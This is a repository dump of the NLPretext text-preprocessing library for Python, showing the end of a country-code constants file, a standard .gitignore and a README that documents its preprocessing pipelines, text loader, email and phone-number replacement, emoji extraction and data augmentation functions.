"LT", 434 | "LV", 435 | "EE", 436 | "MD", 437 | "AM", 438 | "BY", 439 | "AD", 440 | "MC", 441 | "SM", 442 | "UA", 443 | "RS", 444 | "ME", 445 | "XK", 446 | "HR", 447 | "SI", 448 | "BA", 449 | "MK", 450 | "CZ", 451 | "SK", 452 | "LI", 453 | "FK", 454 | "BZ", 455 | "GT", 456 | "SV", 457 | "HN", 458 | "NI", 459 | "CR", 460 | "PA", 461 | "PM", 462 | "HT", 463 | "GP", 464 | "BL", 465 | "MF", 466 | "BO", 467 | "GY", 468 | "EC", 469 | "GF", 470 | "PY", 471 | "MQ", 472 | "SR", 473 | "UY", 474 | "CW", 475 | "BQ", 476 | "TL", 477 | "NF", 478 | "BN", 479 | "NR", 480 | "PG", 481 | "TO", 482 | "SB", 483 | "VU", 484 | "FJ", 485 | "PW", 486 | "WF", 487 | "CK", 488 | "NU", 489 | "WS", 490 | "KI", 491 | "NC", 492 | "TV", 493 | "PF", 494 | "TK", 495 | "FM", 496 | "MH", 497 | "KP", 498 | "HK", 499 | "MO", 500 | "KH", 501 | "LA", 502 | "BD", 503 | "TW", 504 | "MV", 505 | "LB", 506 | "JO", 507 | "SY", 508 | "IQ", 509 | "KW", 510 | "SA", 511 | "YE", 512 | "OM", 513 | "PS", 514 | "AE", 515 | "IL", 516 | "BH", 517 | "QA", 518 | "BT", 519 | "MN", 520 | "NP", 521 | "TJ", 522 | "TM", 523 | "AZ", 524 | "GE", 525 | "KG", 526 | "UZ", 527 | "DO", 528 | ] 529 | 530 | FORMAT_NUMBERS = { 531 | "E164": _phonenumbers.PhoneNumberFormat.E164, 532 | "INTERNATIONAL": _phonenumbers.PhoneNumberFormat.INTERNATIONAL, 533 | "NATIONAL": _phonenumbers.PhoneNumberFormat.NATIONAL, 534 | "RFC3966": _phonenumbers.PhoneNumberFormat.RFC3966, 535 | } 536 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode 2 | # Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode 3 | 4 | ### OSX ### 5 | # General 6 | .DS_Store 7 | .AppleDouble 8 | .LSOverride 9 | 10 | # Icon must end with two \r 11 | Icon 12 | 13 | # Thumbnails 14 | ._* 15 | 16 | # Files that might appear in the root of a volume 17 | .DocumentRevisions-V100 18 | .fseventsd 19 | .Spotlight-V100 20 | .TemporaryItems 21 | .Trashes 22 | .VolumeIcon.icns 23 | .com.apple.timemachine.donotpresent 24 | 25 | # Directories potentially created on remote AFP share 26 | .AppleDB 27 | .AppleDesktop 28 | Network Trash Folder 29 | Temporary Items 30 | .apdisk 31 | 32 | ### PyCharm ### 33 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm 34 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 35 | 36 | # User-specific stuff 37 | .idea/ 38 | .idea/**/workspace.xml 39 | .idea/**/tasks.xml 40 | .idea/**/usage.statistics.xml 41 | .idea/**/dictionaries 42 | .idea/**/shelf 43 | 44 | # Generated files 45 | .idea/**/contentModel.xml 46 | 47 | # Sensitive or high-churn files 48 | .idea/**/dataSources/ 49 | .idea/**/dataSources.ids 50 | .idea/**/dataSources.local.xml 51 | .idea/**/sqlDataSources.xml 52 | .idea/**/dynamic.xml 53 | .idea/**/uiDesigner.xml 54 | .idea/**/dbnavigator.xml 55 | 56 | # Gradle 57 | .idea/**/gradle.xml 58 | .idea/**/libraries 59 | 60 | # Gradle and Maven with auto-import 61 | # When using Gradle or Maven with auto-import, you should exclude module files, 62 | # since they will be recreated, and may cause churn. Uncomment if using 63 | # auto-import. 
64 | # .idea/modules.xml 65 | # .idea/*.iml 66 | # .idea/modules 67 | # *.iml 68 | # *.ipr 69 | 70 | # CMake 71 | cmake-build-*/ 72 | 73 | # Mongo Explorer plugin 74 | .idea/**/mongoSettings.xml 75 | 76 | # File-based project format 77 | *.iws 78 | 79 | # IntelliJ 80 | out/ 81 | 82 | # mpeltonen/sbt-idea plugin 83 | .idea_modules/ 84 | 85 | # JIRA plugin 86 | atlassian-ide-plugin.xml 87 | 88 | # Cursive Clojure plugin 89 | .idea/replstate.xml 90 | 91 | # Crashlytics plugin (for Android Studio and IntelliJ) 92 | com_crashlytics_export_strings.xml 93 | crashlytics.properties 94 | crashlytics-build.properties 95 | fabric.properties 96 | 97 | # Editor-based Rest Client 98 | .idea/httpRequests 99 | 100 | # Android studio 3.1+ serialized cache file 101 | .idea/caches/build_file_checksums.ser 102 | 103 | ### PyCharm Patch ### 104 | # Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721 105 | 106 | # *.iml 107 | # modules.xml 108 | # .idea/misc.xml 109 | # *.ipr 110 | 111 | # Sonarlint plugin 112 | .idea/**/sonarlint/ 113 | 114 | # SonarQube Plugin 115 | .idea/**/sonarIssues.xml 116 | 117 | # Markdown Navigator plugin 118 | .idea/**/markdown-navigator.xml 119 | .idea/**/markdown-navigator/ 120 | 121 | ### Python ### 122 | # Byte-compiled / optimized / DLL files 123 | __pycache__/ 124 | *.py[cod] 125 | *$py.class 126 | 127 | # C extensions 128 | *.so 129 | 130 | # Distribution / packaging 131 | .Python 132 | env/ 133 | build/ 134 | develop-eggs/ 135 | dist/ 136 | downloads/ 137 | eggs/ 138 | .eggs/ 139 | lib/ 140 | lib64/ 141 | parts/ 142 | sdist/ 143 | var/ 144 | wheels/ 145 | pip-wheel-metadata/ 146 | share/python-wheels/ 147 | *.egg-info/ 148 | .installed.cfg 149 | *.egg 150 | MANIFEST 151 | 152 | # PyInstaller 153 | # Usually these files are written by a python script from a template 154 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 155 | *.manifest 156 | *.spec 157 | 158 | # Installer logs 159 | pip-log.txt 160 | pip-delete-this-directory.txt 161 | 162 | # Unit test / coverage reports 163 | htmlcov/ 164 | .tox/ 165 | .nox/ 166 | .coverage 167 | .coverage.* 168 | .cache 169 | nosetests.xml 170 | coverage.xml 171 | *.cover 172 | .hypothesis/ 173 | .pytest_cache/ 174 | .ruff_cache/ 175 | 176 | # Translations 177 | *.mo 178 | *.pot 179 | 180 | # Scrapy stuff: 181 | .scrapy 182 | 183 | # Django stuff: 184 | *.log 185 | 186 | # Sphinx documentation 187 | docs/_build/ 188 | 189 | # PyBuilder 190 | target/ 191 | 192 | # pyenv 193 | .python-version 194 | 195 | # poetry 196 | .venv 197 | 198 | # pipenv 199 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 200 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 201 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 202 | # install all needed dependencies. 
203 | #Pipfile.lock 204 | 205 | # celery beat schedule file 206 | celerybeat-schedule 207 | 208 | # SageMath parsed files 209 | *.sage.py 210 | 211 | # Spyder project settings 212 | .spyderproject 213 | .spyproject 214 | 215 | # Rope project settings 216 | .ropeproject 217 | 218 | # Mr Developer 219 | .mr.developer.cfg 220 | .project 221 | .pydevproject 222 | 223 | # mkdocs documentation 224 | /site 225 | 226 | # mypy 227 | .mypy_cache/ 228 | .dmypy.json 229 | dmypy.json 230 | 231 | # Pyre type checker 232 | .pyre/ 233 | 234 | # Plugins 235 | .secrets.baseline 236 | 237 | ### VisualStudioCode ### 238 | .vscode/* 239 | !.vscode/tasks.json 240 | !.vscode/launch.json 241 | !.vscode/extensions.json 242 | 243 | ### VisualStudioCode Patch ### 244 | # Ignore all local history of files 245 | .history 246 | 247 | ### Windows ### 248 | # Windows thumbnail cache files 249 | Thumbs.db 250 | Thumbs.db:encryptable 251 | ehthumbs.db 252 | ehthumbs_vista.db 253 | 254 | # Dump file 255 | *.stackdump 256 | 257 | # Folder config file 258 | [Dd]esktop.ini 259 | 260 | # Recycle Bin used on file shares 261 | $RECYCLE.BIN/ 262 | 263 | # Windows Installer files 264 | *.cab 265 | *.msi 266 | *.msix 267 | *.msm 268 | *.msp 269 | 270 | # Windows shortcuts 271 | *.lnk 272 | 273 | ### VisualStudio ### 274 | ## Ignore Visual Studio temporary files, build results, and 275 | ## files generated by popular Visual Studio add-ons. 276 | ## 277 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 278 | 279 | # User-specific files 280 | *.rsuser 281 | *.suo 282 | *.user 283 | *.userosscache 284 | *.sln.docstates 285 | 286 | # User-specific files (MonoDevelop/Xamarin Studio) 287 | *.userprefs 288 | 289 | # Mono auto generated files 290 | mono_crash.* 291 | 292 | # Build results 293 | [Dd]ebug/ 294 | [Dd]ebugPublic/ 295 | [Rr]elease/ 296 | [Rr]eleases/ 297 | x64/ 298 | x86/ 299 | [Aa][Rr][Mm]/ 300 | [Aa][Rr][Mm]64/ 301 | bld/ 302 | [Bb]in/ 303 | [Oo]bj/ 304 | [Ll]og/ 305 | 306 | # Visual Studio 2015/2017 cache/options directory 307 | .vs/ 308 | # Uncomment if you have tasks that create the project's static files in wwwroot 309 | #wwwroot/ 310 | 311 | # Visual Studio 2017 auto generated files 312 | Generated\ Files/ 313 | 314 | # MSTest test Results 315 | [Tt]est[Rr]esult*/ 316 | [Bb]uild[Ll]og.* 317 | 318 | # NUnit 319 | *.VisualState.xml 320 | TestResult.xml 321 | nunit-*.xml 322 | 323 | # Build Results of an ATL Project 324 | [Dd]ebugPS/ 325 | [Rr]eleasePS/ 326 | dlldata.c 327 | 328 | # Benchmark Results 329 | BenchmarkDotNet.Artifacts/ 330 | 331 | # .NET Core 332 | project.lock.json 333 | project.fragment.lock.json 334 | artifacts/ 335 | 336 | # StyleCop 337 | StyleCopReport.xml 338 | 339 | # Files built by Visual Studio 340 | *_i.c 341 | *_p.c 342 | *_h.h 343 | *.ilk 344 | *.obj 345 | *.iobj 346 | *.pch 347 | *.pdb 348 | *.ipdb 349 | *.pgc 350 | *.pgd 351 | *.rsp 352 | *.sbr 353 | *.tlb 354 | *.tli 355 | *.tlh 356 | *.tmp 357 | *.tmp_proj 358 | *_wpftmp.csproj 359 | *.vspscc 360 | *.vssscc 361 | .builds 362 | *.pidb 363 | *.svclog 364 | *.scc 365 | 366 | # Chutzpah Test files 367 | _Chutzpah* 368 | 369 | # Visual C++ cache files 370 | ipch/ 371 | *.aps 372 | *.ncb 373 | *.opendb 374 | *.opensdf 375 | *.sdf 376 | *.cachefile 377 | *.VC.db 378 | *.VC.VC.opendb 379 | 380 | # Visual Studio profiler 381 | *.psess 382 | *.vsp 383 | *.vspx 384 | *.sap 385 | 386 | # Visual Studio Trace Files 387 | *.e2e 388 | 389 | # TFS 2012 Local Workspace 390 | $tf/ 391 | 392 | # Guidance Automation Toolkit 
393 | *.gpState 394 | 395 | # ReSharper is a .NET coding add-in 396 | _ReSharper*/ 397 | *.[Rr]e[Ss]harper 398 | *.DotSettings.user 399 | 400 | # JustCode is a .NET coding add-in 401 | .JustCode 402 | 403 | # TeamCity is a build add-in 404 | _TeamCity* 405 | 406 | # DotCover is a Code Coverage Tool 407 | *.dotCover 408 | 409 | # AxoCover is a Code Coverage Tool 410 | .axoCover/* 411 | !.axoCover/settings.json 412 | 413 | # Visual Studio code coverage results 414 | *.coverage 415 | *.coveragexml 416 | 417 | # NCrunch 418 | _NCrunch_* 419 | .*crunch*.local.xml 420 | nCrunchTemp_* 421 | 422 | # MightyMoose 423 | *.mm.* 424 | AutoTest.Net/ 425 | 426 | # Web workbench (sass) 427 | .sass-cache/ 428 | 429 | # Installshield output folder 430 | [Ee]xpress/ 431 | 432 | # DocProject is a documentation generator add-in 433 | DocProject/buildhelp/ 434 | DocProject/Help/*.HxT 435 | DocProject/Help/*.HxC 436 | DocProject/Help/*.hhc 437 | DocProject/Help/*.hhk 438 | DocProject/Help/*.hhp 439 | DocProject/Help/Html2 440 | DocProject/Help/html 441 | 442 | # Click-Once directory 443 | publish/ 444 | 445 | # Publish Web Output 446 | *.[Pp]ublish.xml 447 | *.azurePubxml 448 | # Note: Comment the next line if you want to checkin your web deploy settings, 449 | # but database connection strings (with potential passwords) will be unencrypted 450 | *.pubxml 451 | *.publishproj 452 | 453 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 454 | # checkin your Azure Web App publish settings, but sensitive information contained 455 | # in these scripts will be unencrypted 456 | PublishScripts/ 457 | 458 | # NuGet Packages 459 | *.nupkg 460 | # NuGet Symbol Packages 461 | *.snupkg 462 | # The packages folder can be ignored because of Package Restore 463 | **/[Pp]ackages/* 464 | # except build/, which is used as an MSBuild target. 465 | !**/[Pp]ackages/build/ 466 | # Uncomment if necessary however generally it will be regenerated when needed 467 | #!**/[Pp]ackages/repositories.config 468 | # NuGet v3's project.json files produces more ignorable files 469 | *.nuget.props 470 | *.nuget.targets 471 | 472 | # Microsoft Azure Build Output 473 | csx/ 474 | *.build.csdef 475 | 476 | # Microsoft Azure Emulator 477 | ecf/ 478 | rcf/ 479 | 480 | # Windows Store app package directories and files 481 | AppPackages/ 482 | BundleArtifacts/ 483 | Package.StoreAssociation.xml 484 | _pkginfo.txt 485 | *.appx 486 | *.appxbundle 487 | *.appxupload 488 | 489 | # Visual Studio cache files 490 | # files ending in .cache can be ignored 491 | *.[Cc]ache 492 | # but keep track of directories ending in .cache 493 | !?*.[Cc]ache/ 494 | 495 | # Others 496 | ClientBin/ 497 | ~$* 498 | *~ 499 | *.dbmdl 500 | *.dbproj.schemaview 501 | *.jfm 502 | *.pfx 503 | *.publishsettings 504 | orleans.codegen.cs 505 | 506 | # Including strong name files can present a security risk 507 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 508 | #*.snk 509 | 510 | # Since there are multiple workflows, uncomment next line to ignore bower_components 511 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 512 | #bower_components/ 513 | 514 | # RIA/Silverlight projects 515 | Generated_Code/ 516 | 517 | # Backup & report files from converting an old project file 518 | # to a newer Visual Studio version. 
Backup files are not needed, 519 | # because we have git ;-) 520 | _UpgradeReport_Files/ 521 | Backup*/ 522 | UpgradeLog*.XML 523 | UpgradeLog*.htm 524 | ServiceFabricBackup/ 525 | *.rptproj.bak 526 | 527 | # SQL Server files 528 | *.mdf 529 | *.ldf 530 | *.ndf 531 | 532 | # Business Intelligence projects 533 | *.rdl.data 534 | *.bim.layout 535 | *.bim_*.settings 536 | *.rptproj.rsuser 537 | *- [Bb]ackup.rdl 538 | *- [Bb]ackup ([0-9]).rdl 539 | *- [Bb]ackup ([0-9][0-9]).rdl 540 | 541 | # Microsoft Fakes 542 | FakesAssemblies/ 543 | 544 | # GhostDoc plugin setting file 545 | *.GhostDoc.xml 546 | 547 | # Node.js Tools for Visual Studio 548 | .ntvs_analysis.dat 549 | node_modules/ 550 | 551 | # Visual Studio 6 build log 552 | *.plg 553 | 554 | # Visual Studio 6 workspace options file 555 | *.opt 556 | 557 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 558 | *.vbw 559 | 560 | # Visual Studio LightSwitch build output 561 | **/*.HTMLClient/GeneratedArtifacts 562 | **/*.DesktopClient/GeneratedArtifacts 563 | **/*.DesktopClient/ModelManifest.xml 564 | **/*.Server/GeneratedArtifacts 565 | **/*.Server/ModelManifest.xml 566 | _Pvt_Extensions 567 | 568 | # Paket dependency manager 569 | .paket/paket.exe 570 | paket-files/ 571 | 572 | # FAKE - F# Make 573 | .fake/ 574 | 575 | # CodeRush personal settings 576 | .cr/personal 577 | 578 | # Python Tools for Visual Studio (PTVS) 579 | *.pyc 580 | 581 | # Cake - Uncomment if you are using it 582 | # tools/** 583 | # !tools/packages.config 584 | 585 | # Tabs Studio 586 | *.tss 587 | 588 | # Telerik's JustMock configuration file 589 | *.jmconfig 590 | 591 | # BizTalk build output 592 | *.btp.cs 593 | *.btm.cs 594 | *.odx.cs 595 | *.xsd.cs 596 | 597 | # OpenCover UI analysis results 598 | OpenCover/ 599 | 600 | # Azure Stream Analytics local run output 601 | ASALocalRun/ 602 | 603 | # MSBuild Binary and Structured Log 604 | *.binlog 605 | 606 | # NVidia Nsight GPU debugger configuration file 607 | *.nvuser 608 | 609 | # MFractors (Xamarin productivity tool) working folder 610 | .mfractor/ 611 | 612 | # Local History for Visual Studio 613 | .localhistory/ 614 | 615 | # BeatPulse healthcheck temp database 616 | healthchecksdb 617 | 618 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 619 | MigrationBackup/ 620 | 621 | # DotEnv configuration 622 | .env 623 | 624 | # Database 625 | *.db 626 | *.rdb 627 | 628 | # Pycharm 629 | .idea 630 | venv/ 631 | 632 | # VS Code 633 | .vscode/ 634 | 635 | # Spyder 636 | .spyproject/ 637 | 638 | # Jupyter NB Checkpoints 639 | .ipynb_checkpoints/ 640 | 641 | # exclude data from source control by default 642 | 643 | 644 | # vim 645 | *.swp 646 | *.swo 647 | 648 | data/ 649 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NLPretext 2 | 3 |

4 | <!-- logo: references/logo_nlpretext.png --> 5 | 6 | 7 |
8 | 9 | [![CI status](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml/badge.svg?branch=main&event=push)](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain) 10 | [![CD status](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml/badge.svg?event=release)](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease) 11 | [![Python Version](https://img.shields.io/badge/Python-3.8-informational.svg)](#supported-python-versions) 12 | [![Dependencies Status](https://img.shields.io/badge/dependabot-active-informational.svg)](https://github.com/artefactory/NLPretext/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot) 13 | 14 | [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) 15 | [![Security: bandit](https://img.shields.io/badge/security-bandit-informational.svg)](https://github.com/PyCQA/bandit) 16 | [![Pre-commit](https://img.shields.io/badge/pre--commit-enabled-informational?logo=pre-commit&logoColor=white)](https://github.com/artefactory/NLPretext/blob/main/.pre-commit-config.yaml) 17 | [![Semantic Versions](https://img.shields.io/badge/%F0%9F%9A%80-semantic%20versions-informational.svg)](https://github.com/artefactory/NLPretext/releases) 18 | [![Documentation](https://img.shields.io/badge/doc-sphinx-informational.svg)](https://github.com/artefactory/NLPretext/tree/main/docs) 19 | [![License](https://img.shields.io/badge/License-Apache%20Software%20License%202.0-informational.svg)](https://github.com/artefactory/NLPretext/blob/main/LICENSE) 20 | 21 | All the go-to functions you need to handle NLP use-cases, integrated in NLPretext 22 | 23 |
24 | 25 | # TL;DR 26 | 27 | 28 | > *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?* :tired_face: 29 | 30 | > *Need to efficiently extract email addresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved: 31 | 32 | 33 | **NLPretext got you covered!** :rocket: 34 | 35 | NLPretext packages in a **unique** library all the text **preprocessing** functions you need to **ease** your NLP project. 36 | 37 | 38 | :mag: Quickly explore our preprocessing pipelines and the individual function reference below. 39 | 40 | * [Default preprocessing pipeline](#default_pipeline) 41 | * [Custom preprocessing pipeline](#custom_pipeline) 42 | * [Replacing phone numbers](#replace_phone_numbers) 43 | * [Removing hashtags](#remove_hashtags) 44 | * [Extracting emojis](#extract_emojis) 45 | * [Data augmentation](#data_augmentation) 46 | 47 | 48 | Cannot find what you are looking for? Feel free to open an [issue](https://github.com/artefactory/nlpretext/issues). 49 | 50 | 51 | 52 | # Installation 53 | 54 | ### Supported Python Versions 55 | 56 | - Main supported version: `3.8` 57 | - Other supported versions: `3.9`, `3.10` 58 | 59 | 60 | We strongly advise you to do the remaining steps in a virtual environment. 61 | 62 | To install this library from PyPI, run the following command: 63 | 64 | ```bash 65 | pip install nlpretext 66 | ``` 67 | 68 | or with `Poetry`: 69 | 70 | ```bash 71 | poetry add nlpretext 72 | ``` 73 | 74 | 75 | # Usage 76 | 77 | ## Default pipeline 78 | 79 | Need to preprocess your text data but have no clue about which functions to use and in which order? The default preprocessing pipeline got you covered: 80 | 81 | ```python 82 | from nlpretext import Preprocessor 83 | text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n" 84 | preprocessor = Preprocessor() 85 | text = preprocessor.run(text) 86 | print(text) 87 | # "I just got the best dinner in my life!!! I recommend" 88 | ``` 89 | 90 | ## Create your custom pipeline 91 | 92 | Alternatively, you can create a custom pipeline if you know exactly which functions to apply to your data; here's an example: 93 | 94 | ```python 95 | from nlpretext import Preprocessor 96 | from nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters, 97 | remove_stopwords, lower_text) 98 | from nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji 99 | text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n" 100 | preprocessor = Preprocessor() 101 | preprocessor.pipe(lower_text) 102 | preprocessor.pipe(remove_mentions) 103 | preprocessor.pipe(remove_hashtag) 104 | preprocessor.pipe(remove_emoji) 105 | preprocessor.pipe(remove_eol_characters) 106 | preprocessor.pipe(remove_stopwords, args={'lang': 'en'}) 107 | preprocessor.pipe(remove_punct) 108 | preprocessor.pipe(normalize_whitespace) 109 | text = preprocessor.run(text) 110 | print(text) 111 | # "dinner life recommend" 112 | ``` 113 | 114 | Take a look at all the available functions [here](https://github.com/artefactory/NLPretext/tree/main/nlpretext), in the `preprocess.py` scripts of the basic, social, and token folders. 115 | 116 |
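These functions can also be called directly on a string, without building a `Preprocessor`. Here is a minimal sketch chaining a few of the basic and social functions listed in this README; the output comment reflects the documented behaviour of each function and is illustrative:

```python
from nlpretext.basic.preprocess import lower_text, normalize_whitespace, remove_punct
from nlpretext.social.preprocess import remove_hashtag

text = "This restaurant was amazing !!! #food #dinner"
text = remove_hashtag(text)         # drop "#food #dinner"
text = lower_text(text)             # lowercase everything
text = remove_punct(text)           # replace punctuation marks with whitespace
text = normalize_whitespace(text)   # collapse the extra spaces left behind
print(text)
# "this restaurant was amazing"
```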
117 | ## Load text data 118 | 119 | Pre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts in a local `.txt` file, but it can quickly become difficult if you want to load a lot of texts, stored in multiple formats and split across multiple files. Fortunately, you can use NLPretext's TextLoader class to easily import text data. 120 | While it is not mandatory, our TextLoader works best with Dask; make sure the library is installed if you want the best performance. 121 | 122 | ```python 123 | from nlpretext.textloader import TextLoader 124 | files_path = "local_folder/texts/text.txt" 125 | text_loader = TextLoader(use_dask=True) 126 | text_dataframe = text_loader.read_text(files_path) 127 | print(text_dataframe.text.values.tolist()) 128 | # ["I just got the best dinner in my life!!!", "I recommend", "It was awesome"] 129 | ``` 130 | 131 | File paths can be provided as a string or a list of strings, with or without wildcards. Imports from cloud providers are also supported, provided your machine is authenticated on the project. 132 | 133 | ```python 134 | text_loader = TextLoader(text_column="name_of_text_column_in_your_data") 135 | 136 | local_file_path = "local_folder/texts/text.csv" # File from local folder 137 | local_corpus_path = ["local_folder/texts/text_1.csv", "local_folder/texts/text_2.csv", "local_folder/texts/text_3.csv"] # Multiple files from local folder 138 | 139 | gcs_file_path = "gs://my-bucket/texts/text.json" # File from GCS 140 | s3_file_path = "s3://my-bucket/texts/text.json" # File from S3 141 | hdfs_file_path = "hdfs://folder/texts/text.txt" # File from HDFS 142 | azure_file_path = "az://my-bucket/texts/text.parquet" # File from Azure 143 | 144 | gcs_corpus_path = "gs://my-bucket/texts/text_*.json" # Multiple files from GCS with wildcard 145 | 146 | text_dataframe_1 = text_loader.read_text(local_file_path) 147 | text_dataframe_2 = text_loader.read_text(local_corpus_path) 148 | text_dataframe_3 = text_loader.read_text(gcs_file_path) 149 | text_dataframe_4 = text_loader.read_text(s3_file_path) 150 | text_dataframe_5 = text_loader.read_text(hdfs_file_path) 151 | text_dataframe_6 = text_loader.read_text(azure_file_path) 152 | text_dataframe_7 = text_loader.read_text(gcs_corpus_path) 153 | 154 | ``` 155 | 156 | You can also specify a Preprocessor if you want your data to be directly pre-processed when loaded.
157 | ```python 158 | text_loader = TextLoader(text_column="text_col") 159 | preprocessor = Preprocessor() 160 | 161 | local_file_path = "local_folder/texts/text.csv" # File from local folder 162 | 163 | raw_text_dataframe = text_loader.read_text(local_file_path) 164 | preprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor) 165 | 166 | print(raw_text_dataframe.text_col.values.tolist()) 167 | # ["These texts are not preprocessed", "This is bad ## "] 168 | 169 | print(preprocessed_text_dataframe.text_col.values.tolist()) 170 | # ["These texts are not preprocessed", "This is bad"] 171 | ``` 172 | 173 | 174 | ## Individual Functions 175 | 176 | ### Replacing emails 177 | 178 | ```python 179 | from nlpretext.basic.preprocess import replace_emails 180 | example = "I have forwarded this email to obama@whitehouse.gov" 181 | example = replace_emails(example, replace_with="*EMAIL*") 182 | print(example) 183 | # "I have forwarded this email to *EMAIL*" 184 | ``` 185 | 186 | ### Replacing phone numbers 187 | 188 | ```python 189 | from nlpretext.basic.preprocess import replace_phone_numbers 190 | example = "My phone number is 0606060606" 191 | example = replace_phone_numbers(example, country_to_detect=["FR"], replace_with="*PHONE*") 192 | print(example) 193 | # "My phone number is *PHONE*" 194 | ``` 195 |
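By default, `replace_phone_numbers` relies on a regex, which is fast but can miss unusual formats. Its docstring (reproduced in `nlpretext/basic/preprocess.py` further down this page) also documents a slower but more thorough `method="detection"` that uses the `country_to_detect` list. A minimal sketch; the example numbers and the exact output are illustrative:

```python
from nlpretext.basic.preprocess import replace_phone_numbers

example = "Call me on +33 6 06 06 06 06 or 0606060606"
# Per the docstring, method="detection" catches more number formats than
# the default regex, at the cost of speed; country_to_detect narrows the search.
example = replace_phone_numbers(
    example, country_to_detect=["FR"], replace_with="*PHONE*", method="detection"
)
print(example)
# "Call me on *PHONE* or *PHONE*"
```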
196 | ### Removing Hashtags 197 | 198 | ```python 199 | from nlpretext.social.preprocess import remove_hashtag 200 | example = "This restaurant was amazing #food #foodie #foodstagram #dinner" 201 | example = remove_hashtag(example) 202 | print(example) 203 | # "This restaurant was amazing" 204 | ``` 205 | 206 | ### Extracting emojis 207 | 208 | ```python 209 | from nlpretext.social.preprocess import extract_emojis 210 | example = "I take care of my skin 😀" 211 | example = extract_emojis(example) 212 | print(example) 213 | # [':grinning_face:'] 214 | ``` 215 | 216 | ## Data augmentation 217 | 218 | The augmentation module helps you **generate new texts** from your given examples by modifying some words in the initial ones, while **keeping associated entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can list them in the `stopwords` argument. Modifications depend on the chosen method; the ones currently supported by the module are **substitutions with synonyms** using WordNet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library. 219 | 220 | ```python 221 | from nlpretext.augmentation.text_augmentation import augment_text 222 | example = "I want to buy a small black handbag please." 223 | entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}] 224 | example = augment_text(example, method="wordnet_synonym", entities=entities) 225 | print(example) 226 | # "I need to buy a small black pocketbook please." 227 | ``` 228 |
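Below is a minimal sketch of the `stopwords` argument mentioned above, assuming it takes a list of words to protect from substitution; since substitutions are drawn from synonym candidates, the exact output is illustrative:

```python
from nlpretext.augmentation.text_augmentation import augment_text

example = "I want to buy a small black handbag please."
entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]
# "handbag" is kept unchanged, in addition to the "black" entity.
example = augment_text(
    example, method="wordnet_synonym", entities=entities, stopwords=["handbag"]
)
print(example)
# e.g. "I need to buy a small black handbag please."
```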
229 | 230 | 231 | 232 | # 📈 Releases 233 | 234 | You can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext/releases) page. 235 | 236 | We follow the [Semantic Versions](https://semver.org/) specification. 237 | 238 | We use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up to date with the changes, ready to publish whenever you choose. With the categories option, you can categorize pull requests in release notes using labels. 239 | 240 | For pull requests, the following labels are configured by default: 241 | 242 | | **Label** | **Title in Releases** | 243 | | :-----------------------------------: | :---------------------: | 244 | | `enhancement`, `feature` | 🚀 Features | 245 | | `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring | 246 | | `build`, `ci`, `testing` | 📦 Build System & CI/CD | 247 | | `breaking` | 💥 Breaking Changes | 248 | | `documentation` | 📝 Documentation | 249 | | `dependencies` | ⬆️ Dependencies updates | 250 | 251 | 252 | GitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository when needed. 253 | 254 | ## 🛡 License 255 | 256 | [![License](https://img.shields.io/github/license/artefactory/NLPretext)](https://github.com/artefactory/NLPretext/blob/main/LICENSE) 257 | 258 | This project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext/blob/main/LICENSE) for more details. 259 | 260 | ## 📃 Citation 261 | 262 | ``` 263 | @misc{nlpretext, 264 | author = {artefactory}, 265 | title = {All the go-to functions you need to handle NLP use cases, integrated in NLPretext}, 266 | year = {2021}, 267 | publisher = {GitHub}, 268 | journal = {GitHub repository}, 269 | howpublished = {\url{https://github.com/artefactory/NLPretext}} 270 | } 271 | ``` 272 | 273 | # Project Organization 274 | 275 | . 276 | ├── .github/workflows <- Where the CI and CD live 277 | ├── datasets/external <- Bash scripts to download external datasets 278 | ├── docker <- All you need to build a Docker image from that package 279 | ├── docs <- Sphinx HTML documentation 280 | ├── nlpretext <- Main package. This is where the code lives 281 | │   ├── preprocessor.py <- Main preprocessing script 282 | │   ├── textloader.py <- Main file-loading script 283 